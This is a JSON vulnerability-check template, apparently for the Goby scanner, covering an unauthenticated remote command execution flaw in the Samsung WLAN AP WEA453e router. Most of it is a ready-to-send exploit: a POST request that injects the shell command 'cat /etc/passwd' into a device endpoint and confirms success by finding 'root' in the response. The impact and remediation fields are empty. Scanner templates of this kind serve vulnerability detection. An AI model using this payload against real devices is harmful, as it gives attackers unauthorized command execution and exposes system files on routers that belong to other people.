{
      "Name": "Samsung WLAN AP WEA453e RCE",
      "Level": "3",
      "Tags": [],
      "GobyQuery": "title==\"Samsung WLAN AP\"",
      "Description": "三星 WLAN AP WEA453e路由器  存在远程命令执行漏洞，可在未授权的情况下执行任意命令获取服务器权限",
      "Product": "三星 WLAN AP WEA453e路由器",
      "Homepage": "https://www.samsung.com/",
      "Author": "lxy@secbug.org",
      "Impact": "<p>暂无</p>",
      "Recommandation": "<p>暂无</p>",
      "References": [
            "Internet"
      ],
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "POST",
                        "uri": "/(download)/tmp/a.txt",
                        "follow_redirect": true,
                        "header": {
                              "Connection": "close",
                              "Content-Length": "48"
                        },
                        "data_type": "text",
                        "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt"
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "root",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": []
            }
      ],
      "PostTime": "2021-04-01 11:47:39",
      "GobyVersion": "1.8.237"
}